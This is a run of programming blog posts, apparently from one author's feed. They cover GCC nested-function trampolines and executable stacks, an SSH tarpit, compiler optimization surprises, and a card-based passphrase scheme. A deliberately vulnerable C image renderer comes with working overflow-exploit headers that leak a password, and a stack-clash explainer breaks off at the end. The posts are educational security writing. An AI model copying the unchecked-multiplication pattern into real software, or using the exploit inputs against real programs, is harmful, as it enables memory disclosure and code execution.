In software development there are many concepts that at first glance seem useful and sound, but, after considering the consequences of their implementation and use, are actually horrifying. Examples include thread cancellation, variable length arrays, and memory aliasing. GCC’s closure extension to C is another, and this little feature compromises the entire GNU toolchain.
GCC has its own dialect of C called GNU C. One feature unique to GNU C is nested functions, which allow C programs to define functions inside other functions:
void intsort1(int *base, size_t nmemb)
{
int cmp(const void *a, const void *b)
{
return *(int *)a - *(int *)b;
}
qsort(base, nmemb, sizeof(*base), cmp);
}
The nested function above is straightforward and harmless. It’s nothing
groundbreaking, and it is trivial for the compiler to implement. The
cmp
function is really just a static function whose scope is limited
to the containing function, no different than a local static variable.
With one slight variation the nested function turns into a closure. This is where things get interesting:
void intsort2(int *base, size_t nmemb, _Bool invert)
{
int cmp(const void *a, const void *b)
{
int r = *(int *)a - *(int *)b;
return invert ? -r : r;
}
qsort(base, nmemb, sizeof(*base), cmp);
}
The invert
variable from the outer scope is accessed from the inner
scope. This has clean, proper closure semantics and works
correctly just as you’d expect. It fits quite well with traditional C
semantics. The closure itself is re-entrant and thread-safe. It’s
automatically (read: stack) allocated, and so it’s automatically freed
when the function returns, including when the stack is unwound via
longjmp()
. It’s a natural progression to support closures like this
via nested functions. The eventual caller, qsort
, doesn’t even know
it’s calling a closure!
While this seems so useful and easy, its implementation has serious consequences that, in general, outweigh its benefits. In fact, in order to make this work, the whole GNU toolchain has been specially rigged!
How does it work? The function pointer, cmp
, passed to qsort
must
somehow be associated with its lexical environment, specifically the
invert
variable. A static address won’t do. When I implemented
closures as a toy library, I talked about the function address for
each closure instance somehow needing to be unique.
GCC accomplishes this by constructing a trampoline on the stack. That
trampoline has access to the local variables stored adjacent to it, also
on the stack. GCC also generates a normal cmp
function, like the
simple nested function before, that accepts invert
as an additional
argument. The trampoline calls this function, passing the local variable
as this additional argument.
To illustrate this, I’ve manually implemented intsort2()
below for
x86-64 (System V ABI) without using GCC’s nested function
extension:
int cmp(const void *a, const void *b, _Bool invert)
{
int r = *(int *)a - *(int *)b;
return invert ? -r : r;
}
void intsort3(int *base, size_t nmemb, _Bool invert)
{
unsigned long fp = (unsigned long)cmp;
volatile unsigned char buf[] = {
// mov edx, invert
0xba, invert, 0x00, 0x00, 0x00,
// mov rax, cmp
0x48, 0xb8, fp >> 0, fp >> 8, fp >> 16, fp >> 24,
fp >> 32, fp >> 40, fp >> 48, fp >> 56,
// jmp rax
0xff, 0xe0
};
int (*trampoline)(const void *, const void *) = (void *)buf;
qsort(base, nmemb, sizeof(*base), trampoline);
}
Here’s a complete example you can try yourself on nearly any x86-64 unix-like system: trampoline.c. It even works with Clang. The two notable systems where stack trampolines won’t work are OpenBSD and WSL.
(Note: The volatile
is necessary because C compilers rightfully do
not see the contents of buf
as being consumed. Execution of the
contents isn’t considered.)
In case you hadn’t already caught it, there’s a catch. The linker needs
to link a binary that asks the loader for an executable stack (-z
execstack
):
$ cc -std=c99 -Os -Wl,-z,execstack trampoline.c
That’s because buf
contains x86 code implementing the trampoline:
mov edx, invert ; assign third argument
mov rax, cmp ; store cmp address in RAX register
jmp rax ; jump to cmp
(Note: The absolute jump through a 64-bit register is necessary because
the trampoline on the stack and the jump target will be very far apart.
Further, these days the program will likely be compiled as a Position
Independent Executable (PIE), so cmp
might itself have an high
address rather than load into the lowest 32 bits of the address
space.)
However, executable stacks were phased out ~15 years ago because it makes buffer overflows so much more dangerous! Attackers can inject and execute whatever code they like, typically shellcode. That’s why we need this unusual linker option.
You can see that the stack will be executable using our old friend,
readelf
:
$ readelf -l a.out
...
GNU_STACK 0x00000000 0x00000000 0x00000000
0x00000000 0x00000000 RWE 0x10
...
Note the “RWE” at the bottom right, meaning read-write-execute. This is a really bad sign in a real binary. Do any binaries installed on your system right now have an executable stack? I found one on mine. (Update: A major one was found in the comments by Walter Misar.)
When compiling the original version using a nested function there’s no need for that special linker option. That’s because GCC saw that it would need an executable stack and used this option automatically.
Or, more specifically, GCC stopped requesting a non-executable stack in the object file it produced. For the GNU Binutils linker, the default is an executable stack.
Since this is the default, the only way to get a non-executable stack is
if every object file input to the linker explicitly declares that it
does not need an executable stack. To request a non-executable stack, an
object file must contain the (empty) section .note.GNU-stack
.
If even a single object file fails to do this, then the final program
gets an executable stack.
Not only does one contaminated object file infect the binary, everything
dynamically linked with it also gets an executable stack. Entire
processes are infected! This occurs even via dlopen()
, where the stack
is dynamically made executable to accomodate the new shared object.
I’ve been bit myself. In Baking Data with Serialization I did it completely by accident, and I didn’t notice my mistake until three years later. The GNU linker outputs object files without the special note by default even though the object file only contains data.
$ echo hello world >hello.txt
$ ld -r -b binary -o hello.o hello.txt
$ readelf -S hello.o | grep GNU-stack
$
This is fixed with -z noexecstack
:
$ ld -r -b binary -z noexecstack -o hello.o hello.txt
$ readelf -S hello.o | grep GNU-stack
[ 2] .note.GNU-stack PROGBITS 00000000 0000004c
$
This may happen any time you link object files not produced by GCC, such as output from the NASM assembler or hand-crafted object files.
Nested C closures are super slick, but they’re just not worth the risk of an executable stack, and they’re certainly not worth an entire toolchain being fail open about it.
Update: A rebuttal. My short response is that the issue discussed in my article isn’t really about C the language but rather about an egregious issue with one particular toolchain. The problem doesn’t even arise if you use only C, but instead when linking in object files specifically not derived from C code.
]]>I’m a big fan of tarpits: a network service that intentionally inserts delays in its protocol, slowing down clients by forcing them to wait. This arrests the speed at which a bad actor can attack or probe the host system, and it ties up some of the attacker’s resources that might otherwise be spent attacking another host. When done well, a tarpit imposes more cost on the attacker than the defender.
The Internet is a very hostile place, and anyone who’s ever stood up an Internet-facing IPv4 host has witnessed the immediate and continuous attacks against their server. I’ve maintained such a server for nearly six years now, and more than 99% of my incoming traffic has ill intent. One part of my defenses has been tarpits in various forms. The latest addition is an SSH tarpit I wrote a couple of months ago:
This program opens a socket and pretends to be an SSH server. However, it actually just ties up SSH clients with false promises indefinitely — or at least until the client eventually gives up. After cloning the repository, here’s how you can try it out for yourself (default port 2222):
$ make
$ ./endlessh &
$ ssh -p2222 localhost
Your SSH client will hang there and wait for at least several days before finally giving up. Like a mammoth in the La Brea Tar Pits, it got itself stuck and can’t get itself out. As I write, my Internet-facing SSH tarpit currently has 27 clients trapped in it. A few of these have been connected for weeks. In one particular spike it had 1,378 clients trapped at once, lasting about 20 hours.
My Internet-facing Endlessh server listens on port 22, which is the standard SSH port. I long ago moved my real SSH server off to another port where it sees a whole lot less SSH traffic — essentially none. This makes the logs a whole lot more manageable. And (hopefully) Endlessh convinces attackers not to look around for an SSH server on another port.
How does it work? Endlessh exploits a little paragraph in RFC 4253, the SSH protocol specification. Immediately after the TCP connection is established, and before negotiating the cryptography, both ends send an identification string:
SSH-protoversion-softwareversion SP comments CR LF
The RFC also notes:
The server MAY send other lines of data before sending the version string.
There is no limit on the number of lines, just that these lines must not begin with “SSH-“ since that would be ambiguous with the identification string, and lines must not be longer than 255 characters including CRLF. So Endlessh sends and endless stream of randomly-generated “other lines of data” without ever intending to send a version string. By default it waits 10 seconds between each line. This slows down the protocol, but prevents it from actually timing out.
This means Endlessh need not know anything about cryptography or the vast majority of the SSH protocol. It’s dead simple.
Ideally the tarpit’s resource footprint should be as small as possible. It’s just a security tool, and the server does have an actual purpose that doesn’t include being a tarpit. It should tie up the attacker’s resources, not the server’s, and should generally be unnoticeable. (Take note all those who write the awful “security” products I have to tolerate at my day job.)
Even when many clients have been trapped, Endlessh spends more than 99.999% of its time waiting around, doing nothing. It wouldn’t even be accurate to call it I/O-bound. If anything, it’s timer-bound, waiting around before sending off the next line of data. The most precious resource to conserve is memory.
The most straightforward way to implement something like Endlessh is a
fork server: accept a connection, fork, and the child simply alternates
between sleep(3)
and write(2)
:
for (;;) {
ssize_t r;
char line[256];
sleep(DELAY);
generate_line(line);
r = write(fd, line, strlen(line));
if (r == -1 && errno != EINTR) {
exit(0);
}
}
A process per connection is a lot of overhead when connections are expected to be up hours or even weeks at a time. An attacker who knows about this could exhaust the server’s resources with little effort by opening up lots of connections.
A better option is, instead of processes, to create a thread per connection. On Linux this is practically the same thing, but it’s still better. However, you still have to allocate a stack for the thread and the kernel will have to spend some resources managing the thread.
For Endlessh I went for an even more lightweight version: a
single-threaded poll(2)
server, analogous to stackless green threads.
The overhead per connection is about as low as it gets.
Clients that are being delayed are not registered in poll(2)
. Their
only overhead is the socket object in the kernel, and another 78 bytes
to track them in Endlessh. Most of those bytes are used only for
accurate logging. Only those clients that are overdue for a new line
are registered for poll(2)
.
When clients are waiting, but no clients are overdue, poll(2)
is
essentially used in place of sleep(3)
. Though since it still needs
to manage the accept server socket, it (almost) never actually waits
on nothing.
There’s an option to limit the total number of client connections so
that it doesn’t get out of hand. In this case it will stop polling the
accept socket until a client disconnects. I probably shouldn’t have
bothered with this option and instead relied on ulimit
, a feature
already provided by the operating system.
I could have used epoll (Linux) or kqueue (BSD), which would be much
more efficient than poll(2)
. The problem with poll(2)
is that it’s
constantly registering and unregistering Endlessh on each of the
overdue sockets each time around the main loop. This is by far the
most CPU-intensive part of Endlessh, and it’s all inflicted on the
kernel. Most of the time, even with thousands of clients trapped in
the tarpit, only a small number of them at polled at once, so I opted
for better portability instead.
One consequence of not polling connections that are waiting is that
disconnections aren’t noticed in a timely fashion. This makes the logs
less accurate than I like, but otherwise it’s pretty harmless.
Unforunately even if I wanted to fix this, the poll(2)
interface
isn’t quite equipped for it anyway.
With a poll(2)
server, the biggest overhead remaining is in the
kernel, where it allocates send and receive buffers for each client
and manages the proper TCP state. The next step to reducing this
overhead is Endlessh opening a raw socket and speaking TCP itself,
bypassing most of the operating system’s TCP/IP stack.
Much of the TCP connection state doesn’t matter to Endlessh and doesn’t need to be tracked. For example, it doesn’t care about any data sent by the client, so no receive buffer is needed, and any data that arrives could be dropped on the floor.
Even more, raw sockets would allow for some even nastier tarpit tricks. Despite the long delays between data lines, the kernel itself responds very quickly on the TCP layer and below. ACKs are sent back quickly and so on. An astute attacker could detect that the delay is artificial, imposed above the TCP layer by an application.
If Endlessh worked at the TCP layer, it could tarpit the TCP protocol itself. It could introduce artificial “noise” to the connection that requires packet retransmissions, delay ACKs, etc. It would look a lot more like network problems than a tarpit.
I haven’t taken Endlessh this far, nor do I plan to do so. At the moment attackers either have a hard timeout, so this wouldn’t matter, or they’re pretty dumb and Endlessh already works well enough.
Since writing Endless I’ve learned about Python’s asyncio
, and
it’s actually a near perfect fit for this problem. I should have just
used it in the first place. The hard part is already implemented within
asyncio
, and the problem isn’t CPU-bound, so being written in Python
doesn’t matter.
Here’s a simplified (no logging, no configuration, etc.) version of Endlessh implemented in about 20 lines of Python 3.7:
import asyncio
import random
async def handler(_reader, writer):
try:
while True:
await asyncio.sleep(10)
writer.write(b'%x\r\n' % random.randint(0, 2**32))
await writer.drain()
except ConnectionResetError:
pass
async def main():
server = await asyncio.start_server(handler, '0.0.0.0', 2222)
async with server:
await server.serve_forever()
asyncio.run(main())
Since Python coroutines are stackless, the per-connection memory overhead is comparable to the C version. So it seems asyncio is perfectly suited for writing tarpits! Here’s an HTTP tarpit to trip up attackers trying to exploit HTTP servers. It slowly sends a random, endless HTTP header:
import asyncio
import random
async def handler(_reader, writer):
writer.write(b'HTTP/1.1 200 OK\r\n')
try:
while True:
await asyncio.sleep(5)
header = random.randint(0, 2**32)
value = random.randint(0, 2**32)
writer.write(b'X-%x: %x\r\n' % (header, value))
await writer.drain()
except ConnectionResetError:
pass
async def main():
server = await asyncio.start_server(handler, '0.0.0.0', 8080)
async with server:
await server.serve_forever()
asyncio.run(main())
Try it out for yourself. Firefox and Chrome will spin on that server
for hours before giving up. I have yet to see curl actually timeout on
its own in the default settings (--max-time
/-m
does work
correctly, though).
Parting exercise for the reader: Using the examples above as a starting point, implement an SMTP tarpit using asyncio. Bonus points for using TLS connections and testing it against real spammers.
]]>So far this year I’ve been bitten three times by compiler edge cases in GCC and Clang, each time catching me totally by surprise. Two were caused by historical artifacts, where an ambiguous specification lead to diverging implementations. The third was a compiler optimization being far more clever than I expected, behaving almost like an artificial intelligence.
In all examples I’ll be using GCC 7.3.0 and Clang 6.0.0 on Linux.
The first time I was bit — or, well, narrowly avoided being bit — was when I examined a missed floating point optimization in both Clang and GCC. Consider this function:
double
zero_multiply(double x)
{
return x * 0.0;
}
The function multiplies its argument by zero and returns the result. Any number multiplied by zero is zero, so this should always return zero, right? Unfortunately, no. IEEE 754 floating point arithmetic supports NaN, infinities, and signed zeros. This function can return NaN, positive zero, or negative zero. (In some cases, the operation could also potentially produce a hardware exception.)
As a result, both GCC and Clang perform the multiply:
zero_multiply:
xorpd xmm1, xmm1
mulsd xmm0, xmm1
ret
The -ffast-math
option relaxes the C standard floating point rules,
permitting an optimization at the cost of conformance and
consistency:
zero_multiply:
xorps xmm0, xmm0
ret
Side note: -ffast-math
doesn’t necessarily mean “less precise.”
Sometimes it will actually improve precision.
Here’s a modified version of the function that’s a little more
interesting. I’ve changed the argument to a short
:
double
zero_multiply_short(short x)
{
return x * 0.0;
}
It’s no longer possible for the argument to be one of those special
values. The short
will be promoted to one of 65,535 possible double
values, each of which results in 0.0 when multiplied by 0.0. GCC misses
this optimization (-Os
):
zero_multiply_short:
movsx edi, di ; sign-extend 16-bit argument
xorps xmm1, xmm1 ; xmm1 = 0.0
cvtsi2sd xmm0, edi ; convert int to double
mulsd xmm0, xmm1
ret
Clang also misses this optimization:
zero_multiply_short:
cvtsi2sd xmm1, edi
xorpd xmm0, xmm0
mulsd xmm0, xmm1
ret
But hang on a minute. This is shorter by one instruction. What
happened to the sign-extension (movsx
)? Clang is treating that
short
argument as if it were a 32-bit value. Why do GCC and Clang
differ? Is GCC doing something unnecessary?
It turns out that the x86-64 ABI didn’t specify what happens with the upper bits in argument registers. Are they garbage? Are they zeroed? GCC takes the conservative position of assuming the upper bits are arbitrary garbage. Clang takes the boldest position of assuming arguments smaller than 32 bits have been promoted to 32 bits by the caller. This is what the ABI specification should have said, but currently it does not.
Fortunately GCC also conservative when passing arguments. It promotes arguments to 32 bits as necessary, so there are no conflicts when linking against Clang-compiled code. However, this is not true for Intel’s ICC compiler: Clang and ICC are not ABI-compatible on x86-64.
I don’t use ICC, so that particular issue wouldn’t bite me, but if I was ever writing assembly routines that called Clang-compiled code, I’d eventually get bit by this.
Without looking it up or trying it, what does this function return? Think carefully.
int
float_compare(void)
{
float x = 1.3f;
return x == 1.3f;
}
Confident in your answer? This is a trick question, because it can return either 0 or 1 depending on the compiler. Boy was I confused when this comparison returned 0 in my real world code.
$ gcc -std=c99 -m32 cmp.c # float_compare() == 0
$ clang -std=c99 -m32 cmp.c # float_compare() == 1
So what’s going on here? The original ANSI C specification wasn’t
clear about how intermediate floating point values get rounded, and
implementations all did it differently. The C99 specification
cleaned this all up and introduced FLT_EVAL_METHOD
.
Implementations can still differ, but at least you can now determine
at compile-time what the compiler would do by inspecting that macro.
Back in the late 1980’s or early 1990’s when the GCC developers were
deciding how GCC should implement floating point arithmetic, the trend
at the time was to use as much precision as possible. On the x86 this
meant using its support for 80-bit extended precision floating point
arithmetic. Floating point operations are performed in long double
precision and truncated afterward (FLT_EVAL_METHOD == 2
).
In float_compare()
the left-hand side is truncated to a float
by the
assignment, but the right-hand side, despite being a float
literal,
is actually “1.3” at 80 bits of precision as far as GCC is concerned.
That’s pretty unintuitive!
The remnants of this high precision trend are still in JavaScript, where all arithmetic is double precision (even if simulated using integers), and great pains have been made to work around the performance consequences of this. Until recently, Mono had similar issues.
The trend reversed once SIMD hardware became widely available and
there were huge performance gains to be had. Multiple values could be
computed at once, side by side, at lower precision. So on x86-64, this
became the default (FLT_EVAL_METHOD == 0
). The young Clang compiler
wasn’t around until well after this trend reversed, so it behaves
differently than the backwards compatible GCC on the old x86.
I’m a little ashamed that I’m only finding out about this now. However, by the time I was competent enough to notice and understand this issue, I was already doing nearly all my programming on the x86-64.
I’ve saved this one for last since it’s my favorite. Suppose we have
this little function, new_image()
, that allocates a greyscale image
for, say, some multimedia library.
static unsigned char *
new_image(size_t w, size_t h, int shade)
{
unsigned char *p = 0;
if (w == 0 || h <= SIZE_MAX / w) { // overflow?
p = malloc(w * h);
if (p) {
memset(p, shade, w * h);
}
}
return p;
}
It’s a static function because this would be part of some slick header library (and, secretly, because it’s necessary for illustrating the issue). Being a responsible citizen, the function even checks for integer overflow before allocating anything.
I write a unit test to make sure it detects overflow. This function should return 0.
/* expected return == 0 */
int
test_new_image_overflow(void)
{
void *p = new_image(2, SIZE_MAX, 0);
return !!p;
}
So far my test passes. Good.
I’d also like to make sure it correctly returns NULL — or, more
specifically, that it doesn’t crash — if the allocation fails. But how
can I make malloc()
fail? As a hack I can pass image dimensions that
I know cannot ever practically be allocated. Essentially I want to
force a malloc(SIZE_MAX)
, e.g. allocate every available byte in my
virtual address space. For a conventional 64-bit machine, that’s 16
exibytes of memory, and it leaves space for nothing else, including
the program itself.
/* expected return == 0 */
int
test_new_image_oom(void)
{
void *p = new_image(1, SIZE_MAX, 0xff);
return !!p;
}
I compile with GCC, test passes. I compile with Clang and the test fails. That is, the test somehow managed to allocate 16 exibytes of memory, and initialize it. Wat?
Disassembling the test reveals what’s going on:
test_new_image_overflow:
xor eax, eax
ret
test_new_image_oom:
mov eax, 1
ret
The first test is actually being evaluated at compile time by the
compiler. The function being tested was inlined into the unit test
itself. This permits the compiler to collapse the whole thing down to
a single instruction. The path with malloc()
became dead code and
was trivially eliminated.
In the second test, Clang correctly determined that the image buffer is
not actually being used, despite the memset()
, so it eliminated the
allocation altogether and then simulated a successful allocation
despite it being absurdly large. Allocating memory is not an observable
side effect as far as the language specification is concerned, so it’s
allowed to do this. My thinking was wrong, and the compiler outsmarted
me.
I soon realized I can take this further and trick Clang into
performing an invalid optimization, revealing a bug. Consider
this slightly-optimized version that uses calloc()
when the shade is
zero (black). The calloc()
function does its own overflow check, so
new_image()
doesn’t need to do it.
static void *
new_image(size_t w, size_t h, int shade)
{
unsigned char *p = 0;
if (shade == 0) { // shortcut
p = calloc(w, h);
} else if (w == 0 || h <= SIZE_MAX / w) { // overflow?
p = malloc(w * h);
if (p) {
memset(p, color, w * h);
}
}
return p;
}
With this change, my overflow unit test is now also failing. The
situation is even worse than before. The calloc()
is being
eliminated despite the overflow, and replaced with a simulated
success. This time it’s actually a bug in Clang. While failing a unit
test is mostly harmless, this could introduce a vulnerability in a
real program. The OpenBSD folks are so worried about this sort of
thing that they’ve disabled this optimization.
Here’s a slightly-contrived example of this. Imagine a program that maintains a table of unsigned integers, and we want to keep track of how many times the program has accessed each table entry. The “access counter” table is initialized to zero, but the table of values need not be initialized, since they’ll be written before first access (or something like that).
struct table {
unsigned *counter;
unsigned *values;
};
static int
table_init(struct table *t, size_t n)
{
t->counter = calloc(n, sizeof(*t->counter));
if (t->counter) {
/* Overflow already tested above */
t->values = malloc(n * sizeof(*t->values));
if (!t->values) {
free(t->counter);
return 0; // fail
}
return 1; // success
}
return 0; // fail
}
This function relies on the overflow test in calloc()
for the second
malloc()
allocation. However, this is a static function that’s
likely to get inlined, as we saw before. If the program doesn’t
actually make use of the counter
table, and Clang is able to
statically determine this fact, it may eliminate the calloc()
. This
would also eliminate the overflow test, introducing a
vulnerability. If an attacker can control n
, then they can
overwrite arbitrary memory through that values
pointer.
Besides this surprising little bug, the main lesson for me is that I should probably isolate unit tests from the code being tested. The easiest solution is to put them in separate translation units and don’t use link-time optimization (LTO). Allowing tested functions to be inlined into the unit tests is probably a bad idea.
The unit test issues in my real program, which was a bit more sophisticated than what was presented here, gave me artificial intelligence vibes. It’s that situation where a computer algorithm did something really clever and I felt it outsmarted me. It’s creepy to consider how far that can go. I’ve gotten that even from observing AI I’ve written myself, and I know for sure no human taught it some particularly clever trick.
My favorite AI story along these lines is about an AI that learned how to play games on the Nintendo Entertainment System. It didn’t understand the games it was playing. It’s optimization task was simply to choose controller inputs that maximized memory values, because that’s generally associated with doing well — higher scores, more progress, etc. The most unexpected part came when playing Tetris. Eventually the screen would fill up with blocks, and the AI would face the inevitable situation of losing the game, with all that memory being reinitialized to low values. So what did it do?
Just before the end it would pause the game and wait… forever.
]]>There are various flavors of two different word lists here:
Hardware random number generators are difficult to verify and may not actually be as random as they promise, either intentionally or unintentionally. For the particularly paranoid, Diceware and Pokerware are an easily verifiable alternative for generating secure passphrases for cryptographic purposes. At any time, a deck of 52 playing cards is in one of 52! possible arrangements. That’s more than 225 bits of entropy. If you give your deck a thorough shuffle, it will be in an arrangement that has never been seen before and will never be seen again. Pokerware draws on some of these bits to generate passphrases.
The Pokerware list has 5,304 words (12.4 bits per word), compared to Diceware’s 7,776 words (12.9 bits per word). My goal was to invent a card-drawing scheme that would uniformly select from a list in the same sized ballpark as Diceware. Much smaller and you’d have to memorize more words for the same passphrase strength. Much larger and the words on the list would be more difficult to memorize, since the list would contain longer and less frequently used words. Diceware strikes a nice balance at five dice.
One important difference for me is that I like my Pokerware word lists a lot more than the two official Diceware lists. My lists only have simple, easy-to-remember words (for American English speakers, at least), without any numbers or other short non-words. Pokerware has two official lists, “formal” and “slang,” since my early testers couldn’t agree on which was better. Rather than make a difficult decision, I took the usual route of making no decision at all.
The “formal” list is derived in part from Google’s Ngram Viewer, with my own additional filters and tweaking. It’s called “formal” because the ngrams come from formal publications and represent more formal kinds of speech.
The “slang” list is derived from every reddit comment between December 2005 and May 2017, tamed by the same additional filters. I have this data on hand, so I may as well put it to use. I figured more casually-used words would be easier to remember. Due to my extra filtering, there’s actually a lot of overlap between these lists, so the differences aren’t too significant.
If you have your own word list, perhaps in a different language, you can use the Makefile in the repository to build your own Pokerware lookup table, both plain text and PDF. The PDF is generated using Groff macros.
Thoroughly shuffle the deck.
Draw two cards. Sort them by value, then suit. Suits are in alphabetical order: Clubs, Diamonds, Hearts, Spades.
Draw additional cards until you get a card that doesn’t match the face value of either of your initial two cards. Observe its suit.
Using your two cards and observed suit, look up a word in the table.
Place all cards back in the deck, shuffle, and repeat from step 2 until you have the desired number of words. Each word is worth 12.4 bits of entropy.
A word of warning about step 4: If you use software to do the word list
lookup, beware that it might save your search/command history — and
therefore your passphrase — to a file. For example, the less
pager
will store search history in ~/.lesshst
. It’s easy to prevent that
one:
$ LESSHISTFILE=- less pokerware-slang.txt
Suppose in step 2 you draw King of Hearts (KH/K♥) and Queen of Clubs (QC/Q♣).
In step 3 you first draw King of Diamonds (KD/K♦), discarding it because it matches the face value of one of your cards from step 2.
Next you draw Four of Spades (4S/4♠), taking spades as your extra suit.
In order, this gives you Queen of Clubs, King of Hearts, and Spades: QCKHS or Q♣K♥♠. This corresponds to “wizard” in the formal word list and would be the first word in your passphrase.
I now have an excuse to keep a deck of cards out on my desk at work. I’ve been using Diceware — or something approximating it since I’m not so paranoid about hardware RNGs — for passwords for over 8 years now. From now I’ll deal new passwords from an in-reach deck of cards. Though typically I need to tweak the results to meet outdated character-composition requirements.
]]>This small C program converts a vector image from a custom format (described below) into a Netpbm image, a conveniently simple format. The program defensively and carefully parses its input, but still makes a subtle, fatal mistake. This mistake not only leads to sensitive information disclosure, but, with a more sophisticated attack, could be used to execute arbitrary code.
After getting the hang of the interface for the program, I encourage you to take some time to work out an exploit yourself. Regardless, I’ll reveal a functioning exploit and explain how it works.
The input format is line-oriented and very similar to Netpbm itself. The
first line is the header, starting with the magic number V2
(ASCII)
followed by the image dimensions. The target output format is Netpbm’s
“P2” (text gray scale) format, so the “V2” parallels it. The file must end
with a newline.
V2 <width> <height>
What follows is drawing commands, one per line. For example, the s
command sets the value of a particular pixel.
s <x> <y> <00–ff>
Since it’s not important for the demonstration, this is the only command I implemented. It’s easy to imagine additional commands to draw lines, circles, Bezier curves, etc.
Here’s an example (example.txt
) that draws a single white point in the
middle of the image:
V2 256 256
s 127 127 ff
The rendering tool reads standard input to standard output:
$ render < example.txt > example.pgm
Here’s what it looks like rendered:
However, you will notice that when you run the rendering tool, it prompts you for username and password. This is silly, of course, but it’s an excuse to get “sensitive” information into memory. It will accept any username/password combination where the username and password don’t match each other. The key is this: It’s possible to craft a valid image that leaks the the entered password.
Without spoiling anything yet, let’s look at how this program works. The
first thing to notice is that I’m using a custom “obstack”
allocator instead of malloc()
and free()
. Real-world allocators have
some defenses against this particular vulnerability. Plus a specific
exploit would have to target a specific libc. By using my own allocator,
the exploit will mostly be portable, making for a better and easier
demonstration.
The allocator interface should be pretty self-explanatory, except for two
details. This is an obstack allocator, so freeing an object also frees
every object allocated after it. Also, it doesn’t call malloc()
in the
background. At initialization you give it a buffer from which to allocate
all memory.
struct mstack {
char *top;
char *max;
char buf[];
};
struct mstack *mstack_init(void *, size_t);
void *mstack_alloc(struct mstack *, size_t);
void mstack_free(struct mstack *, void *);
There are no vulnerabilities in these functions (I hope!). It’s just here for predictability.
Next here’s the “authentication” function. It reads a username and
password combination from /dev/tty
. It’s only an excuse to get a flag in
memory for this capture-the-flag game. The username and password must be
less than 32 characters each.
int
authenticate(struct mstack *m)
{
FILE *tty = fopen("/dev/tty", "r+");
if (!tty) {
perror("/dev/tty");
return 0;
}
char *user = mstack_alloc(m, 32);
if (!user) {
fclose(tty);
return 0;
}
fputs("User: ", tty);
fflush(tty);
if (!fgets(user, 32, tty))
user[0] = 0;
char *pass = mstack_alloc(m, 32);
int result = 0;
if (pass) {
fputs("Password: ", tty);
fflush(tty);
if (fgets(pass, 32, tty))
result = strcmp(user, pass) != 0;
}
fclose(tty);
mstack_free(m, user);
return result;
}
Next here’s a little version of calloc()
for the custom allocator. Hmm,
I wonder why this is called “naive”…
void *
naive_calloc(struct mstack *m, unsigned long nmemb, unsigned long size)
{
void *p = mstack_alloc(m, nmemb * size);
if (p)
memset(p, 0, nmemb * size);
return p;
}
Next up is a paranoid wrapper for strtoul()
that defensively checks its
inputs. If it’s out of range of an unsigned long
, it bails out. If
there’s trailing garbage, it bails out. If there’s no number at all, it
bails out. If you make prolonged eye contact, it bails out.
unsigned long
safe_strtoul(char *nptr, char **endptr, int base)
{
errno = 0;
unsigned long n = strtoul(nptr, endptr, base);
if (errno) {
perror(nptr);
exit(EXIT_FAILURE);
} else if (nptr == *endptr) {
fprintf(stderr, "Expected an integer\n");
exit(EXIT_FAILURE);
} else if (!isspace(**endptr)) {
fprintf(stderr, "Invalid character '%c'\n", **endptr);
exit(EXIT_FAILURE);
}
return n;
}
The main()
function parses the header using this wrapper and allocates
some zeroed memory:
unsigned long width = safe_strtoul(p, &p, 10);
unsigned long height = safe_strtoul(p, &p, 10);
unsigned char *pixels = naive_calloc(m, width, height);
if (!pixels) {
fputs("Not enough memory\n", stderr);
exit(EXIT_FAILURE);
}
Then there’s a command processing loop, also using safe_strtoul()
. It
carefully checks bounds against width
and height
. Finally it writes
out a Netpbm, P2 (.pgm) format.
printf("P2\n%ld %ld 255\n", width, height);
for (unsigned long y = 0; y < height; y++) {
for (unsigned long x = 0; x < width; x++)
printf("%d ", pixels[y * width + x]);
putchar('\n');
}
The vulnerability is in something I’ve shown above. Can you find it?
Did you find it? If you’re on a platform with 64-bit long
, here’s your
exploit:
V2 16 1152921504606846977
And here’s an exploit for 32-bit long
:
V2 16 268435457
Here’s how it looks in action. The most obvious result is that the program crashes:
$ echo V2 16 1152921504606846977 | ./mstack > capture.txt
User: coolguy
Password: mysecret
Segmentation fault
Here are the initial contents of capture.txt
:
P2
16 1152921504606846977 255
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
109 121 115 101 99 114 101 116 10 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Where did those junk numbers come from in the image data? Plug them into
an ASCII table and you’ll get “mysecret”. Despite allocating the image
with naive_calloc()
, the password has found its way into the image! How
could this be?
What happened is that width * height
overflows an unsigned long
.
(Well, technically speaking, unsigned integers are defined not to
overflow in C, wrapping around instead, but it’s really the same thing.)
In naive_calloc()
, the overflow results in a value of 16, so it only
allocates and clears 16 bytes. The requested allocation “succeeds” despite
far exceeding the available memory. The caller has been given a lot less
memory than expected, and the memory believed to have been allocated
contains a password.
The final part that writes the output doesn’t multiply the integers and doesn’t need to test for overflow. It uses a nested loop instead, continuing along with the original, impossible image size.
How do we fix this? Add an overflow check at the beginning of the
naive_calloc()
function (making it no longer naive). This is what the
real calloc()
does.
if (nmemb && size > -1UL / nmemb)
return 0;
The frightening takeaway is that this check is very easy to forget. It’s a subtle bug with potentially disastrous consequences.
In practice, this sort of program wouldn’t have sensitive data resident in
memory. Instead an attacker would target the program’s stack with those
s
commands — specifically the return pointers — and perform a ROP
attack against the application. With the exploit header above and a
platform where long
the same size as a size_t
, the program will behave
as if all available memory has been allocated to the image, so the s
command could be used to poke custom values anywhere in memory. This is
a much more complicated exploit, and it has to contend with ASLR and
random stack gap, but it’s feasible.
You can find the complete code for this article here, ready to run:
But first, what is a stack clash? Here’s a rough picture of the
typical way process memory is laid out. The stack starts at a high
memory address and grows downwards. Code and static data sit at low
memory, with a brk
pointer growing upward to make small allocations.
In the middle is the heap, where large allocations and memory mappings
take place.
Below the stack is a slim guard page that divides the stack and the region of memory reserved for the heap. Reading or writing to that memory will trap, causing the program to crash or some special action to be taken. The goal is to prevent the stack from growing into the heap, which could cause all sorts of trouble, like security issues.
The problem is that this thin guard page isn’t enough. It’s possible to put a large allocation on the stack, never read or write to it, and completely skip over the guard page, such that the heap and stack overlap without detection.
Once this happens, writes into the heap will change memory on the stack and vice versa. If an attacker can cause the program to make such a large allocation on the stack, then legitimate writes into memory on the heap can manipulate local variables or return pointers, changing the program’s control flow. This can bypass buffer overflow protections, such as stack canaries.
Now, I’m going to abruptly change topics to discuss binary search trees. We’ll get back to stack clash in a bit. Suppose we have a binary tree which we would like to iterate depth-first. For this demonstration, here’s the C interface to the binary tree.
struct tree {
struct tree *left;
struct tree *right;
char *key;
char *value;
};
